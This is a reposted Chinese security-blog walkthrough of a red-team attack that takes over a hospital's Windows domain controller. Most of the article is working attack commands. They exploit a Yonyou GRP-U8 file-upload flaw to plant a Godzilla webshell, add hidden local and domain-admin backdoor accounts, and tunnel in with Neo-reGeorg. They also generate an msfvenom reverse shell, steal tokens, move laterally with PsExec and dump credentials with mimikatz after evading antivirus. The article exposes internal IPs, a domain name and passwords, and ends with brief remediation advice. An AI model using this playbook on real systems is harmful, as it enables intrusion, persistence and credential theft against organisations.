红蓝对抗中打穿某单位成功拿下域控
2023-3-19 20:36:38 Author: 渗透安全团队(查看原文) 阅读量:60 收藏

现在只对常读和星标的公众号才展示大图推送,建议大家能把渗透安全团队设为星标”,否则可能就看不到了啦

前言

前几天发了一篇文章,评论区骂声一片。那文章中是shiro一把梭,说实话要是运气好的话碰到旧的网站确实能一把梭,况且那文章也是几年前的文章。说实话我也是年轻人别人说我,我肯定不愿意,我也就怼回去了

靶标信息

本次靶标如下

漏洞目标:http://x.x.x.x:8000/公司官网:http://xxx.com/联系方式:1888888888(同微信)联系方式:[email protected]888888.com涉及单位:XX医院有限责任公司注册资本:9166.67万元人民币单位地址:xxxxxxxxxxxxxxxxxxx

开始攻击

步骤一:检测抓取XXX在网络中的资产分布,检测到以下地址为其行政事业财务管理系统界面(那肯定有戏了阿

步骤二:目录扫描检测是否存在漏洞发现用友 GRP-U8 UploadFileData接口并下载以下项目执行命令进行漏洞检测....发现存在漏洞

#项目地址https://github.com/xanszZZ/YY_upfile#安装pocsuite3pip3 install -i https://pypi.tuna.tsinghua.edu.cn/simple pocsuite3#进行漏洞检测pocsuite -r YY_upfile.py -f file.txt

步骤三:使用攻击脚本攻击成功后访问以下页面进行漏洞验证....查看是否上传存在漏洞即可尝试获取网站后门

http://X.X.X.X:8000/R9iPortal/debugg.jsp

步骤四:在以上项目的攻击脚本中将测试代码data变量中的值修改为一句话木马进而执行以下命令获取网站后门.....

#攻击命令pocsuite -r YY_upfile2.py -f file.txt

步骤五:以执行成功后拼接访问以下地址为网站后门地址...进行验证;返回空白页面说名成功并使用哥斯拉客户端连接验证 Bingo!

http://X.X.X.X:8000/R9iPortal/U8date.jsp    //哥斯拉默认连接

步骤六:在使用哥斯拉连接上网站后门进行简单的信息收集如下...

whoami                 #nt authority\systemhostname               #whkqgu8ipconfig /all          #域wuhankq.com   内172.16.0.8  systeminfo             #Microsoft Windows Server 2008 R2 Enterprise   VMware, Inctasklist /svc          #无net time /domain       #WHKQBAK.wuhankq.com  //查询时间服务器  172.16.0.1netstat -an            #RDP:3389net user 4pts$ 123[email protected] /add            #成功net localgroup administrators 4pts$ /add #成功net user 4k 123admiN /add /doamin        #失败net group "Domain Users" /domain         #无4k用户
net user 4pts$ 123[email protected] /add #隐藏的系统账户net localgroup administrators 4pts$ /add

步骤七:判断出存在域环境直接执行上线...

步骤八:由于只有内网IP地址且已经开启RDP服务,故需要在此搭建通信隧道进行远程桌面连接,部署Neo-Regorg并访问,本地执行命令与边界主机建立通信隧道....

#Neo-regorg服务端地址http://X.X.X.X:8000/showstatus.jsp#通信隧道建立命令python3 neoreg.py -k 123admiN -u http://X.X.X.X:8000/showstatus.jsp

步骤九:开启SockCap64软件并配置好代理进行测试...成功

步骤十:在Sockcap64上开启远程桌面连接并输入以上步骤中创建的本地账号(系统后门)进行连接...

步骤十一:开始进行内网信息收集....执行以下命令并获取信息

#CS执行logonpasswords    //username:Administrator   password:[email protected]shell net group "Domain Computers" /domain    //255台主机 #哥斯拉中查询敏感信息C:/Users/Administrator.WUHANKQ/   //文件修改日期2022年12月7日

步骤十二:尝试使用读取出的本地账号与明文密码对域控进行PTH攻击且失败无果.....存在以下攻击思路!

1.进一步扫描获取更多的信息,但是动静会很大~暂且备用2.本地机器上存在域管理员的用户文件夹~可优先尝试窃取该用户的会话令牌

步骤十三:选择第二个攻击思路!直接在哥斯拉中反弹MSF的Shell....失败;生成MSF上传执行上线....

#哥斯拉操作payload windows/meterpreter/reverse_tcp   //反弹失败payload java/meterpreter/reverse_tcp      //反弹成功  无法获取会话令牌#生成木马文件msfvenom -p windows/meterpreter/reverse_tcp LHOST=X.X.X.X LPORT=6666 -f exe -o Sysupdate.exe#MSFCONSOLEmsfconsole                                      //启动MSF的漏洞攻击框架use exploit/multi/handler                       //调用木马监听模块set payload windows/meterpreter/reverse_tcp     //设置木马服务端类型set lhost 10.0.20.3                             //设置监听的地址set lport 6666                                  //设置监听的端口run                                             //启动当前的监听

步骤十四:开始窃取域管理员的会话令牌并验证...

#Meterpreter操作use incognito      //进入incognito模块list_tokens -u    //列出令牌impersonate_token "WUHANKQ\Administrator"    //选择要窃取的账号#验证权限shell          chcp 65001      //活动代码页字符为UTF-8编码whoami    

步骤十五:尝试在Meterpreter中创建域控管理员账户...失败;在CMD下执行创建成功;

#Meterpreter操作add_user username password -h 域控IPadd_group_user "Domain Admins" username -h 域控IPadd_user 24k 123[email protected] -h 172.16.0.20add_group_user "Domain Admins" 24k -h 172.16.0.20#目标CMD下操作chcp 65001net user 24k 123[email protected] /add /domainnet group "Domain Admins" 24k /add /domainnet group "Domain Admins" /domainnet group "Administrators" 24k /add /domain     #失败

步骤十六:已经获取域管理后门账号尝试在边界主机上对域控进行远程登陆....失败;

username:wuhankq\24kpassword:123admiN@

步骤十七:出现以下问题,网上给出的解决方案需要在目标终端中执行以下命令【没卵用】...尝试横向移动到域控

#解决命令sfc /scannow    //无果#横向移动命令net use \\172.16.0.20 /u:wuhankq\24k 123[email protected]   //建立IPC$连接net use                    //查看已经建立的IPC$连接PsExec64.exe \\172.16.0.20 -s cmd.exe -accepteula   //反弹cmddir \\172.16.0.20\c$                                 //查看默认的C盘共享copy SystemUpdate.exe \\172.16.0.20\c$               //拷贝本地CS马执行上线

步骤十八:在域控上执行命令查询存在的防护软件为卡巴斯基,这里对mimikatz进行源码免杀上传执行...

#AV查询shell tasklist /svcavp.exe-> Kasperskyavp.exe-> Kaspersky#明文抓取privilege::debugsekurlsa::logonpasswords

成功拿下域控

修复建议

1、升级用友GRP-U8管理系统并打上最新的补丁文件

2、域控策略中设置域管理员禁止登陆除域控的其他主机

3、增强用户密码强度 并设置定期修改密码的用户策略


付费圈子

欢 迎 加 入 星 球 !

代码审计+免杀+渗透学习资源+各种资料文档+各种工具+付费会员

进成员内部群

星球的最近主题和星球内部工具一些展示

关 注 有 礼

关注下方公众号回复“666”可以领取一套领取黑客成长秘籍

 还在等什么?赶紧点击下方名片关注学习吧!


群聊 | 技术交流群-群除我佬

干货|史上最全一句话木马

干货 | CS绕过vultr特征检测修改算法

实战 | 用中国人写的红队服务器搞一次内网穿透练习

实战 | 渗透某培训平台经历

实战 | 一次曲折的钓鱼溯源反制

免责声明
由于传播、利用本公众号渗透安全团队所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,公众号渗透安全团队及作者不为承担任何责任,一旦造成后果请自行承担!如有侵权烦请告知,我们会立即删除并致歉。谢谢!
好文分享收藏赞一下最美点在看哦

文章来源: http://mp.weixin.qq.com/s?__biz=MzkxNDAyNTY2NA==&mid=2247501103&idx=4&sn=2405d6e15171ceb2b9db6b6f87211827&chksm=c1763880f601b196f89d2af120f6dfdb70074cc2a4f38d801c4554a6671b13b0fdbcf02e87a4#rd
如有侵权请联系:admin#unsafe.sh